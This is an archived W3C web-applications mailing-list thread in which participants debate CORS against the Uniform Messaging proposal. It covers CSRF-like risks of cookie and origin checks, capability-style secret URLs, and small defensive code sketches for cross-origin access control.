Under the two header design, everyone has read access to the raw bits
of the XBL file. The one header design makes an empty promise to
protect read access to the XBL file.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-21 Thread Tyler Close
On Mon, Dec 21, 2009 at 2:39 PM, Ian Hickson i...@hixie.ch wrote:
 On Mon, 21 Dec 2009, Tyler Close wrote:

 No, there is a difference in access-control between the two designs.

 In the two header design:
 1) An XHR GET of the XBL file data by example.org *is* allowed.
 2) An xbl import of the XBL data by example.org triggers a rendering error.

 That's a bad design. It would make people think they had secured the file
 when they had not.

The headers explicitly say that a read request from any Origin is allowed:

Access-Control-Allow-Origin: *

The above syntax is the one CORS came up with. How could it be made clearer?

 Security should be consistent across everything.

It is. All Origins have read access. The data just renders in a
different way depending on if/how it is embedded.

 In the one header design:
 1) An XHR GET of the XBL file data by example.org is *not* allowed.
 2) An xbl import of the XBL data by example.org triggers a rendering error.

 That's what I want.

What you want, and the mechanism you propose to get it, are at odds.
I've described the CSRF-like attack multiple times. The access control
model you propose doesn't actually work.

To actually control access to the XBL file data you need to use
something like the secret token designs we've discussed.

 Under the two header design, everyone has read access to the raw bits
 of the XBL file.

 That's a bad thing.

In the scenario you described, everyone *does*  have read access to
the raw bits. Anyone can just point their browser directly at the XBL file's
URL and save the data. In your scenario, we were just trying to discourage
bandwidth stealing.

 The one header design makes an empty promise to protect read access to
 the XBL file.

 How is it an empty promise?

See above.

We don't seem to be making any progress at understanding each other,
so I'm going to give up on this thread until I see some signs of
progress. Thanks for your time.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-17 Thread Tyler Close
On Thu, Dec 17, 2009 at 10:08 AM, Maciej Stachowiak m...@apple.com wrote:
 My goal was merely to argue that adding an origin/cookie check to a
 secret-token-based mechanism adds meaningful defense in depth, compared to
 just using any of the proposed protocols over UM. I believe my argument
 holds. If the secret token scheme has any weakness whatsoever, whether in
 generation of the tokens, or in accidental disclosure by the user or the
 service consumer, origin checks provide an orthogonal defense that must be
 breached separately. This greatly reduces the attack surface. While this may
 not provide any additional security in theory, where we can assume the
 shared secret is generated and managed correctly, it does provide additional
 security in the real world, where people make mistakes.

The reason the origin/cookie check doesn't provide defense in depth is
that the programming patterns we want to support necessarily blow
holes in any origin/cookie defense. We want clients to act as
deputies, because that's a useful thing to be able to do. For example,
consider a web page widget that implements the Observer pattern: when
its state changes, it fires off a POST request to a list of observer
URLs. Clients can register any URL they want with the web page widget.
If these POST requests carry origin/cookies, then a CSRF-like attack
is easy.
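
To make that concrete, here is a sketch of such a widget done in the UM
style (all names are invented, and an XMLHttpRequest with credentials
switched off stands in for a yet-to-be-specified UniformRequest API);
registering arbitrary URLs stays safe because the notification carries
no ambient authority:

var observers = []; // URLs registered by arbitrary clients

function registerObserver(url) {
  observers.push(url);
}

function notifyObservers(state) {
  for (var i = 0; i < observers.length; i++) {
    var req = new XMLHttpRequest();
    req.open('POST', observers[i]);
    req.withCredentials = false; // no cookies, no HTTP Auth: the request
                                 // conveys only what the widget was given
    req.send(state);
  }
}

// Any authority the observer endpoint needs travels as an unguessable
// token inside the URL the client chose to register, e.g.:
registerObserver('https://example.net/hooks/kDq84rxw.../state-changed');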

There are lots of other ways we want to use the Web, as it is meant to
be used, that aren't viable if you're trying to maintain the viability
of an origin/cookie defense. For example, Ian correctly points out
that under an origin/cookie defense, using URIs as identifiers is
dangerous, see:

http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/1247.html

But we want to use URIs to identify things, because it's useful, and we
want it to be safe. For cross-origin scenarios, it can't be safe while
still maintaining the viability of origin/cookie defenses.

Basically, the programming patterns of the Web, when used in
cross-origin scenarios, break origin/cookie defenses. We want to keep
the Web programming patterns and replace the origin/cookie defense
with something that better fits the Web. We're willing to give up our
cookies before we'll give up our URIs.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-17 Thread Tyler Close
On Thu, Dec 17, 2009 at 9:38 AM, Ian Hickson i...@hixie.ch wrote:
 One of the big reasons to restrict which origin can
 use a particular resource is bandwidth management. For example,
 resources.example.com might want to allow *.example.com to use its XBL
 files, but not allow anyone else to directly use the XBL files straight
 from resources.example.com.

An XBL file could include some JavaScript code that blows up the page
if the manipulated DOM has an unexpected document.domain.
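
For example (purely a sketch; the allowed-domain pattern and the
reaction are placeholders), the binding's script could refuse to
cooperate when bound into a foreign page:

(function () {
  var allowed = /(^|\.)example\.com$/;
  if (!allowed.test(document.domain)) {
    // Not one of our own pages: refuse to render anything useful.
    document.documentElement.innerHTML = '';
    throw new Error('this binding is only supported on *.example.com pages');
  }
})();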

I think this solution more precisely implements the control you want.
You're not trying to prevent other sites from downloading your XBL
file. You're only trying to encourage them to host their own version
of your XBL file.

In general, the control you want is most similar to iframe busting.
A separate standard that covers these rendering instructions would be
better than conflating them with an access-control standard. For
example, a new HTTP response header could provide instructions on what
embedding configurations are supported. The instructions may be
independent of how the embedding is created, such as by: iframe,
img, script or xbl.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-17 Thread Tyler Close
On Thu, Dec 17, 2009 at 3:46 PM, Ian Hickson i...@hixie.ch wrote:
 On Thu, 17 Dec 2009, Tyler Close wrote:
 On Thu, Dec 17, 2009 at 9:38 AM, Ian Hickson i...@hixie.ch wrote:
  One of the big reasons to restrict which origin can use a particular
  resource is bandwidth management. For example, resources.example.com
  might want to allow *.example.com to use its XBL files, but not allow
  anyone else to directly use the XBL files straight from
  resources.example.com.

 An XBL file could include some JavaScript code that blows up the page if
 the manipulated DOM has an unexpected document.domain.

 This again requires script. I don't deny there are plenty of solutions you
 could use to do this with script. The point is that CORS allows one line
 in an .htaccess file to solve this for all XBL files, all XML files, all
 videos, everything on a site, all at once.

I'm not trying to deny you your one-line fix. I'm just saying it
should be a different line than the one used for access control. Conflating
Conflating the two issues, the way CORS does, creates CSRF-like
problems. Address bandwidth management, along with other embedding
issues, while standardizing an iframe busting technique.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-17 Thread Tyler Close
On Thu, Dec 17, 2009 at 4:41 PM, Ian Hickson i...@hixie.ch wrote:
 On Thu, 17 Dec 2009, Tyler Close wrote:
 On Thu, Dec 17, 2009 at 3:46 PM, Ian Hickson i...@hixie.ch wrote:
  On Thu, 17 Dec 2009, Tyler Close wrote:
  On Thu, Dec 17, 2009 at 9:38 AM, Ian Hickson i...@hixie.ch wrote:
   One of the big reasons to restrict which origin can use a
   particular resource is bandwidth management. For example,
   resources.example.com might want to allow *.example.com to use its
   XBL files, but not allow anyone else to directly use the XBL files
   straight from resources.example.com.
 
  An XBL file could include some JavaScript code that blows up the page
  if the manipulated DOM has an unexpected document.domain.
 
  This again requires script. I don't deny there are plenty of solutions
  you could use to do this with script. The point is that CORS allows
  one line in an .htaccess file to solve this for all XBL files, all XML
  files, all videos, everything on a site, all at once.

 I'm not trying to deny you your one line fix. I'm just saying it should
 be a different one line than the one used for access control. Conflating
 the two issues, the way CORS does, creates CSRF-like problems. Address
 bandwidth management, along with other embedding issues, while
 standardizing an iframe busting technique.

 What one-liner are you proposing that would solve the problem for XBL,
 XML data, videos, etc, all at once?

Well, I wasn't intending to make a frame busting proposal, but it
seems something like the following could work...

Starting from the X-FRAME-OPTIONS proposal, say the response header
also applies to all embedding that the page renderer does. So it also
covers img, video, etc. In addition to the current values, the
header can also list hostname patterns that may embed the content. So,
in your case:

X-FRAME-OPTIONS: *.example.com
Access-Control-Allow-Origin: *

Which means anyone can access this content, but sites outside
*.example.com should host their own copy, rather than framing or
otherwise directly embedding my copy.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-15 Thread Tyler Close
On Mon, Dec 14, 2009 at 6:14 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Mon, Dec 14, 2009 at 4:52 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Sun, Dec 13, 2009 at 6:15 PM, Maciej Stachowiak m...@apple.com wrote:
 There seem to be two schools of thought that to some extent inform the
 thinking of participants in this discussion:
 1) Try to encourage capability-based mechanisms by not providing anything
 that lets you extend the use of origins and cookies.
 2) Try to build on the model that already exists and that we are likely
 stuck with, and provide practical ways to mitigate its risks.

 My own perspective on this is:
 3) In scenarios involving more than 2 parties, the ACL model is
 inherently vulnerable to CSRF-like problems. So, for cross-origin
 scenarios, a non-ACL model solution is needed.

 The above is a purely practical perspective. When writing or auditing
 code, UM provides a way to eliminate an entire class of attacks. I
 view it the same way I do moving from C to a memory safe language to
 avoid buffer overflow and related attacks.

 For what it's worth, I'm not sure that "eliminating" is correct here.
 With UM, I can certainly see people doing things like using a wrapping
 library for all UM requests (very commonly done with XHR today), and
 then letting that library add the security token to the request.

Yes, I said "provides a way to eliminate". I agree that UM doesn't by
itself eliminate CSRF in a way that can't be undone by poor
application design. The UM draft we sent to this list covers this
point in the Security Considerations section. See the second to last
paragraph in that section:

http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/att-0931/draft.html#security

That paragraph reads:

Application designers should design protocols that transmit only those
permissions justified by the purpose of each request. These
permissions should not be context sensitive, such as "apply delete
permission to any identifier in this request". Such a permission
creates the danger of a CSRF-like attack in which an attacker causes
an unexpected identifier to be in the request. Instead, a permission
should be specific, such as "apply delete permission to resource foo".


UM provides a safe substrate for application protocols that are
invulnerable to CSRF-like attacks. Without UM, this can't be done
since the browser automatically adds credentials to all requests.
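
A small sketch of the difference (every URL, token and field name below
is invented):

// Context-sensitive permission -- dangerous: whatever identifier an
// attacker manages to smuggle into the request is what gets deleted.
//
//   POST https://example.net/api?key=can-delete-anything
//   { "op": "delete", "id": "<any identifier found in this request>" }
//
// Specific permission -- safe: the unguessable URL *is* the permission
// to delete exactly one resource, so nothing injected into the request
// can widen it.
var req = new XMLHttpRequest();
req.open('POST', 'https://example.net/resource/foo/delete?key=y7wQx2...');
req.send();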

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-15 Thread Tyler Close
On Mon, Dec 14, 2009 at 4:26 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Mon, Dec 14, 2009 at 2:38 PM, Adam Barth w...@adambarth.com wrote:
 On Mon, Dec 14, 2009 at 2:13 PM, Tyler Close tyler.cl...@gmail.com wrote:
 For example, the
 User Consent Phase and Grant Phase above could be replaced by a single
 copy-paste operation by the user.

 Any design that involves storing confidential information in the
 clipboard is insecure because IE lets arbitrary web sites read the
 user's clipboard.  You can judge that to be a regrettable choice by
 the IE team, but it's just a fact of the world.

 And so we use the alternate, no-copy-paste design on IE while waiting
 for a better world; one in which users can safely copy data between
 web pages.

Just so that everyone knows, IE has changed this policy, so it's not a
situation where we'll be waiting forever. See:

http://msdn.microsoft.com/en-us/library/bb250473(VS.85).aspx

Adam, were you aware of this policy change?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-14 Thread Tyler Close
On Mon, Dec 14, 2009 at 10:16 AM, Adam Barth w...@adambarth.com wrote:
 On Mon, Dec 14, 2009 at 5:53 AM, Jonathan Rees j...@creativecommons.org 
 wrote:
 The only complaint I know of regarding UM is that it is so complicated
 to use in practice that it will not be as enabling as CORS

 Actually, Tyler's UM protocol requires the user to confirm message 5
 to prevent a CSRF attack.  Maciej's CORS version of the protocol
 requires no such user confirmation.  I think it's safe to say that
 asking the user to confirm security-critical operations is not a good
 approach.

For Ian Hickson's challenge problem, I came up with a design that does
not require any confirmation, or any other user interaction. See:

http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/1232.html

That same design can be used to solve Maciej's challenge problem.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Next Steps for CORS and Uniform Messaging [Was: Re: CORS versus Uniform Messaging?]

2009-12-14 Thread Tyler Close
Hi Art,

Yes, I'm happy to serve as editor for UM, as indicated by #1 below. I
will also contribute to the discussion needed for the CORS vs UM
comparison document for #3 below.

--Tyler

On Mon, Dec 14, 2009 at 3:57 AM, Arthur Barstow art.bars...@nokia.com wrote:
 Hi All,

 Given the feedback on this thread, my proposal on the next steps are:

 1. Mark and/or Tyler prepare a FPWD of UM

 2. Anne proactively drive CORS to LCWD

 3. Before we begin a CfC to publish #1 and #2 above, some combination of the
 active participants in the CORS and UM discussions (Adam, Anne, Jonas,
 Maciej, Hixie, Tyler, Mark, etc.) create a comparison document of CORS and
 UM (e.g. pros, cons, overlaps, etc.) as Nikunj did for the group's two DB
 specs [1]. This document does not necessarily need to be exhaustive. Who can
 commit to helping with this document?

 -Art Barstow

 [1] http://www.w3.org/2008/webapps/wiki/Database


 On Dec 10, 2009, at 1:53 PM, Barstow Art (Nokia-CIC/Boston) wrote:

 CORS and Uniform Messaging People,

 We are now just a few weeks away from the fourth anniversary of the
 February 2006 start of what has now become the CORS spec. In those
 four years, the model has been
 significantly improved, Microsoft deployed XDR, we now have the
 Uniform Messaging counter-proposal. Meanwhile, the industry doesn't
 have an agreed standard to address the important use cases.

 Although we are following the Darwinian model of competing specs with
 Web SQL Database and Indexed Database API, I believe I'm not alone in
 thinking that competing specs in the CORS and UM space are not desirable
 and perhaps even harmful.

 Ideally, the group would agree on a single model and this could be
 achieved by converging CORS + UM, abandoning one model in deference
 to the other, etc.

 Can we all rally behind a single model?

 -Art Barstow


 On Dec 4, 2009, at 1:30 PM, ext Mark S. Miller wrote:

 We intend that Uniform Messaging be adopted instead of CORS. We intend
 that those APIs that were expected to utilize CORS (SSE, XBL) instead
 utilize Uniform Messaging. As for XHR2, we intend to propose a similar
 UniformRequest that utilizes Uniform Messaging.

 We intend the current proposal, Uniform Messaging Level One, as an
 alternative to the pre-flight-less subset of CORS. As for the
 remaining Level Two issues gated on pre-flight, perhaps these are best
 addressed after we settle the SOP restrictions that server-side app
 authors may count on, which therefore protocols such as CORS and
 Uniform Messaging must uphold.


 On Fri, Dec 4, 2009 at 10:04 AM, Arthur Barstow
 art.bars...@nokia.com wrote:

 Mark, Tyler,

 On Nov 23, 2009, at 12:33 PM, ext Tyler Close wrote:

 I made some minor edits and formatting improvements to the document
 sent out on Friday. The new version is attached. If you read the
 prior
 version, there's no need to review the new one. If you're just
 getting
 started, use the attached copy.

 Would you please clarify your intent with your Uniform Messaging
 proposal
 vis-à-vis CORS and your expectation(s) from the Working Group?

 -Art Barstow








-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-14 Thread Tyler Close
On Mon, Dec 14, 2009 at 2:38 PM, Adam Barth w...@adambarth.com wrote:
 On Mon, Dec 14, 2009 at 2:13 PM, Tyler Close tyler.cl...@gmail.com wrote:
 For example, the
 User Consent Phase and Grant Phase above could be replaced by a single
 copy-paste operation by the user.

 Any design that involves storing confidential information in the
 clipboard is insecure because IE lets arbitrary web sites read the
 user's clipboard.  You can judge that to be a regrettable choice by
 the IE team, but it's just a fact of the world.

And so we use the alternate, no-copy-paste design on IE while waiting
for a better world; one in which users can safely copy data between
web pages.

I imagine many passwords and other PII are made vulnerable by IE's
clipboard policy.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-14 Thread Tyler Close
On Mon, Dec 14, 2009 at 3:04 PM, Maciej Stachowiak m...@apple.com wrote:

 On Dec 14, 2009, at 2:38 PM, Adam Barth wrote:

 On Mon, Dec 14, 2009 at 2:13 PM, Tyler Close tyler.cl...@gmail.com
 wrote:

 For example, the
 User Consent Phase and Grant Phase above could be replaced by a single
 copy-paste operation by the user.

 Any design that involves storing confidential information in the
 clipboard is insecure because IE lets arbitrary web sites read the
 user's clipboard.  You can judge that to be a regrettable choice by
 the IE team, but it's just a fact of the world.

 Information that's copied and pasted is highly likely to leak in other ways
 than just the IE paste behavior. For example, if it looks like a URL, users
 are likely to think it's a good idea to do things like share the URL with
 their friends, or to post it to a social bookmark site, or to Twitter it, or
 to send it in email. Even if it does not look like a URL, users may think
 they need to save it (likely somewhere insecure) so they don't forget.

I think the user would only be tempted to post the URL to the world if
the returned representation was interesting to talk about. That
doesn't need to be the case.

In any case, like I said earlier, if you think copy-paste is evil,
I've provided alternate designs that avoid it.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-14 Thread Tyler Close
On Sun, Dec 13, 2009 at 6:15 PM, Maciej Stachowiak m...@apple.com wrote:
 There seem to be two schools of thought that to some extent inform the
 thinking of participants in this discussion:
 1) Try to encourage capability-based mechanisms by not providing anything
 that lets you extend the use of origins and cookies.
 2) Try to build on the model that already exists and that we are likely
 stuck with, and provide practical ways to mitigate its risks.

My own perspective on this is:
3) In scenarios involving more than 2 parties, the ACL model is
inherently vulnerable to CSRF-like problems. So, for cross-origin
scenarios, a non-ACL model solution is needed.

The above is a purely practical perspective. When writing or auditing
code, UM provides a way to eliminate an entire class of attacks. I
view it the same way I do moving from C to a memory safe language to
avoid buffer overflow and related attacks.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-10 Thread Tyler Close
On Thu, Dec 10, 2009 at 1:48 AM, Ian Hickson i...@hixie.ch wrote:
 On Wed, 9 Dec 2009, Tyler Close wrote:

 If you're willing to tolerate a little bit of implementation mechanism,
 I can do you one better on the UI side.

 Generally speaking, server-to-server communication is highly undesirable,
 as it requires far more work on all sides.


 From the user's perspective, the UI will be:

  - User visits site B and says nothing unique to site B.
  - Users sees his data from site A on site B.

 Meaning the user won't have to start a login session with site A before
 using site B. They can just go to site B and immediately get full
 functionality.

 For each user:
 1. Site B generates an unguessable token and associates it with a user 
 account.
 2. A page from Site B does an HTML form post of the token to Site A.
 3. Server-side, Site A sends a request to Site B containing the token
 and the corresponding unguessable user feed URL.
 4. Site B stores the feed URL in the user account.
 5. From then on, a page from Site B can do a direct GET on the feed
 URL. Steps 1 through 4 are a one-time setup.

 All of the above is invisible to the user. There are no user actions
 required. The implementation is fairly straightforward and the UI is
 strictly superior to your ideal UI.

 How is the user recognised if he gives nothing unique to site B and
 doesn't login to site A?

OK, here's a fuller description of the exchange, one that also meets the
new requirement of no server-to-server communication:

Initial assumptions:
- Site A wants to give Site B access to all user feeds.
- Site A and Site B do *not* share a username namespace, such as
OpenID, so Site A is unable to just give Site B a table mapping
usernames to unguessable URLs for feeds.
- No server-to-server communication is allowed.
- No user actions are allowed.

There are two phases to the solution.
Grant: Site A grants Site B permission to access a particular user
feed. This is a one-time setup operation per user account. In this
phase, it is assumed that the user is either logged into Site A, or
will log into the site on the first navigation request to the site.
Exercise: Site B reads the feed. This happens every time the feed is
accessed. In this phase, the user may or may not be logged into Site
A, it doesn't matter. The user is logged into Site B.

So, whereas your CORS based solution requires a login to Site A for
both phases, the UMP solution only requires a one-time login to Site A
for the Grant Phase.

Grant Phase:
1. User logs into Site B.

2. Site B generates an unguessable token (to be used for CSRF
protection on a subsequent request) and associates it with the user
account.

3. A page from Site B does an HTML form post of the token to Site A,
using a URL like https://A/getfeed?csrf=asdf. The csrf query
string parameter holds the unguessable token generated in step 2.

4. Site A receives a POST request containing the user's login cookies
and the csrf token. Site A generates (or looks up) an unguessable URL
for the user's feed. Site A responds with a 303 back to Site B that
contains the feed URL and the csrf token, such as
https://B/gotfeed?csrf=asdf&feed=xxx. The feed query string
parameter holds the unguessable URL for the user's feed.

5. Site B receives a GET request containing the user's login cookies,
the csrf token and the feed URL. Site B does a lookup for the expected
csrf token in the user's account. If the csrf token is not the
expected one, Site B stops processing the request. Site B discards the
csrf token. Site B stores the feed URL in the user's account. Site B
responds with the normal, post-login user home page.

Excercise Phase:
1. A page from Site B gets the user feed URL from the user's account
and uses a UniformRequest (XHR-like protocol for uniform requests) to
do a GET request.

2. Site A receives a GET request on a feed URL, looks up the
corresponding feed data and returns it, along with the same-origin
opt-out header.


You can think of the funny little dance that the Grant Phase does as a
way for Site A and Site B to conspire to force the user to do the
copy-paste operation on the feed URL. Personally, I'd want Site B to
support showing feeds from an unbounded set of sites, and would be
content to do the copy-paste. For Ian's scenario, I've shown that you
don't have to do it that way. The UI is strictly better than the one
Ian had envisioned, since repeated login to Site A is no longer
required. The algorithm also meets all the arbitrary constraints
placed on its operation.
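
For concreteness, here is a minimal sketch of the Grant Phase bookkeeping as
plain TypeScript functions rather than a real HTTP stack; the function names,
the Map-based storage and the exact URL shapes are illustrative assumptions,
not part of any proposal.

// Sketch only: the Grant Phase dance reduced to plain functions.
import { randomBytes } from "node:crypto";

const unguessable = () => randomBytes(16).toString("hex");

// --- Site B state ---
const pendingCsrf = new Map<string, string>();  // csrf token -> Site B user id
const storedFeeds = new Map<string, string>();  // Site B user id -> feed URL

// Grant step 2: Site B mints a csrf token for the logged-in user and builds
// the form action used in step 3.
function siteB_startGrant(userId: string): string {
  const csrf = unguessable();
  pendingCsrf.set(csrf, userId);
  return `https://A/getfeed?csrf=${csrf}`;
}

// --- Site A state ---
const feedUrlFor = new Map<string, string>();   // Site A user -> feed URL

// Grant step 4: Site A handles the POST (its own login cookie identifies the
// user) and answers with a 303 Location pointing back at Site B.
function siteA_getfeed(siteAUser: string, csrf: string): string {
  let feed = feedUrlFor.get(siteAUser);
  if (!feed) {
    feed = `https://A/feed/${siteAUser}/?s=${unguessable()}`;
    feedUrlFor.set(siteAUser, feed);
  }
  return `https://B/gotfeed?csrf=${csrf}&feed=${encodeURIComponent(feed)}`;
}

// Grant step 5: Site B checks the csrf token before storing the feed URL.
function siteB_gotfeed(userId: string, csrf: string, feed: string): boolean {
  if (pendingCsrf.get(csrf) !== userId) return false;  // unexpected token: stop
  pendingCsrf.delete(csrf);
  storedFeeds.set(userId, feed);
  return true;
}

// Exercise phase: a page from Site B fetches storedFeeds.get(userId) with a
// uniform (credential-free) request; Site A answers any GET that presents
// the unguessable feed URL.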

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-10 Thread Tyler Close
On Thu, Dec 10, 2009 at 12:19 PM, Ian Hickson i...@hixie.ch wrote:
 On Thu, 10 Dec 2009, Tyler Close wrote:
 On Thu, Dec 10, 2009 at 10:17 AM, Ian Hickson i...@hixie.ch wrote:
  That looks _really_ complicated.

 By many measures, your CORS based solution is more complicated.

 The measure I care about is how easy is it to explain and implement. By
 that measure, CORS is simpler. (It's not my solution, by the way; I
 personally haven't really been involved in CORS' development and don't
 really have a horse in this race.)

By your CORS based solution, I meant your solution to providing Site
B with access to a feed hosted by Site A. I meant your *use* of CORS
for this example, not CORS itself.

In terms of ease of explanation, if you're willing to let the user do
a single copy-paste operation, much of the complexity melts away.
Start with that explanation and then refer them to the appendix for a
design that avoids the copy-paste if they think that user gesture is
evil.

 1. It requires a login to Site A for every login to Site B, wheres the
 UMP solution does not. That means the UMP solution has:
 - fewer HTTP requests across the full lifetime of the interaction
 - fewer user interactions across the full lifetime of the interaction

 In practice, Site A has a login mechanism already, so this isn't a big
 deal. (If it didn't, then it wouldn't have per-user data that it could
 expose to multiple other sites.)

I wasn't counting new lines of code to be written. I was counting the
requests generated by that code and the user gestures required.

 2. It creates a CSRF-like vulnerability. In an interaction with Site C,
 Site B must be careful with how it handles the response to a GET request
 done at the direction of Site C. For the GET request, Site C could
 provide the well-known URL for user feeds. A page from Site B could then
 inadvertently expose this data to Site C because the code wasn't written
 with the expectation that Site A might be involved.

 This only happens if you use URIs as tokens, which I strongly believe is a
 bad idea in general. It's simpler, and safe, not to.

In the sentence above, are you using the word token as a synonym for
identifier?

 3. The CORS solution is not implementable for popular user agents today.
 The XDR API does not support the kind of request the CORS solution needs
 to make. The UMP solution can be implemented in a cross-platform way
 today (the code needs browser specific customizations for different
 constructor names and parameters, but it can work).

 Indeed. Today that's what people do. It's complicated and I'd like us to
 provide a simpler solution.

I guess we just disagree on what counts as complexity.

 The UMP spec may not be exactly what you had in mind; but I believe I've
 shown that it meets all the requirements, is safer, and represents a
 consensus amongst current deployments.

 I honestly think that any benefit that might be reaped from avoiding
 sending the Origin explicitly is completely outweighed by the risks
 involved in having such a complicated implementation.

The scenario you outlined requires more than just the Origin header,
it also requires the user cookies. Adding the Origin header by itself
wouldn't eliminate any complexity. It would create CSRF-like problems.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-09 Thread Tyler Close
On Wed, Dec 9, 2009 at 1:39 AM, Ian Hickson i...@hixie.ch wrote:
 On Tue, 8 Dec 2009, Tyler Close wrote:

 I assume you want to move on to the XHR-like example, so I've just got a
 few clarification questions about it...

 The examples are equivalent as far as I can tell. Both are important; for
 me, the video one is more important since I'm editing the spec that will
 need to define how to work with video.

Since the examples are equivalent, I'll stick to the XHR one for now,
since I'm not sure I fully understand the video one yet.

 On Tue, Dec 8, 2009 at 11:18 AM, Ian Hickson i...@hixie.ch wrote:
  http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/att-0914/draft.html
 
  To recast the question in terms of XMLHttpRequest, how would one label a
  static resource on an intranet server, e.g.:
 
    http://marketing.corp.example.com/productcodes.xml
 
  ...such that it can be read (using XMLHttpRequest) by scripts embedded on
  pages from the following hosts:
 
    http://www.corp.example.com/
    http://finance.corp.example.com/
    http://eng.corp.example.com/
    http://intranet.example.com/
 
  ...but such that it could _not_ be read by pages from the following hosts
  (i.e. the HTTP response would not be made accessible to scripts on pages
  from these hosts):
 
    http://hostile-blog.example.com/
    http://www.hostile.example/

 Are you saying a firewall prevents the author of the attack pages from
 directing his own browser to any of the legitimate pages that have
 access to the data?

 I don't think the firewall situation is really relevant, but for the sake
 of argument, let's say that the user is inside the fireall (or on VPN),
 and that *.corp.example.com are only accessible inside the firewall, and
 that intranet.example.com is accessible outside but only through TLS and
 with strong client authentication, and that hostile-blog.example.com and
 www.hostile.example are accessible outside without authentication.

The firewall situation determines whether or not an attacker can
access the secret data directly, rather than via an attack page. I see
that for intranet.example.com, you've replaced the firewall with TLS
and strong client authentication. That should serve the same purpose,
if we assume that no attackers have an account on
intranet.example.com.

 So, all the resources with access to the secret data are hosted by
 servers behind a firewall; and all the attackers are outside the
 firewall?

 No.

I assume that's a no to the first clause only, since an attacker
behind the firewall has direct access to the secret data. As discussed
in the previous paragraph, you've added TLS and client authentication
to intranet.example.com, so that it can live outside the firewall.

 Furthermore, all the resources with access to the secret data are
 trusted to not send the secret data to the attacker?

 Yes, the resources who should be able to read the secret data are trusted
 not to send the data to untrusted third parties.


 It also seems that any resource hosted behind the firewall also has
 access to the secret data, since it can just send a request
 server-to-server, instead of server-to-browser-to-server. True?

 In this example, yes, the resource on marketing.corp.example.com is not
 protected from direct access in any way other than via the firewall.

OK, so the whitelist of four sites with access to the data also
implicitly includes all sites behind the firewall.

 A more realistic example would probably have the resource protected from
 direct access by cookie-based authentication, but for the time being I
 think it's simpler to focus on the example without _user_ authentication
 being present also.

Ok, then for this initial simpler case, the simplest UMP solution that
satisfies the stated security constraints is for marketing to put the
product codes at a URL like:

https://marketing.corp.example.com/productcodes/?s=42tjiyrvnbpoal

, where the value of the s query string parameter is an unguessable secret.

A GET response from this URL is served with the same-origin opt-out header.

The product code URL is then given to all sites that should have
access to the data. The data display page at these sites starts by
getting a copy of the product code URL. The HTTP response that returns
the product code URL must either be protected by some access-control
mechanism, or not include the same-origin opt-out header. The data
display page can then use an UMP XHR to access the product code data
using the product code URL.
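
As a rough sketch (not normative text), the marketing server could be written
along these lines; the header spelling below is only an assumption, to be
replaced by whatever the UMP draft defines as the same-origin opt-out header,
and TLS termination is assumed to happen elsewhere.

import { createServer } from "node:http";
import { timingSafeEqual } from "node:crypto";

const SECRET = "42tjiyrvnbpoal";                     // per-resource unguessable token
const OPT_OUT_NAME = "Access-Control-Allow-Origin";  // assumed spelling of the opt-out header
const OPT_OUT_VALUE = "*";

// Constant-time comparison so the secret cannot be guessed byte by byte.
function sameSecret(a: string, b: string): boolean {
  const x = Buffer.from(a), y = Buffer.from(b);
  return x.length === y.length && timingSafeEqual(x, y);
}

createServer((req, res) => {
  const url = new URL(req.url ?? "/", "https://marketing.corp.example.com");
  if (url.pathname === "/productcodes/" &&
      sameSecret(url.searchParams.get("s") ?? "", SECRET)) {
    res.setHeader(OPT_OUT_NAME, OPT_OUT_VALUE);      // same-origin opt-out
    res.setHeader("Content-Type", "application/xml");
    res.end("<productcodes/>");                      // stand-in for the real file
  } else {
    res.statusCode = 404;                            // don't reveal whether the path exists
    res.end();
  }
}).listen(8080);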

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-09 Thread Tyler Close
On Wed, Dec 9, 2009 at 7:43 AM, Ian Hickson i...@hixie.ch wrote:
 Ok, let's move on to a more complex case.

 Consider a static resource that is protected by a cookie authentication
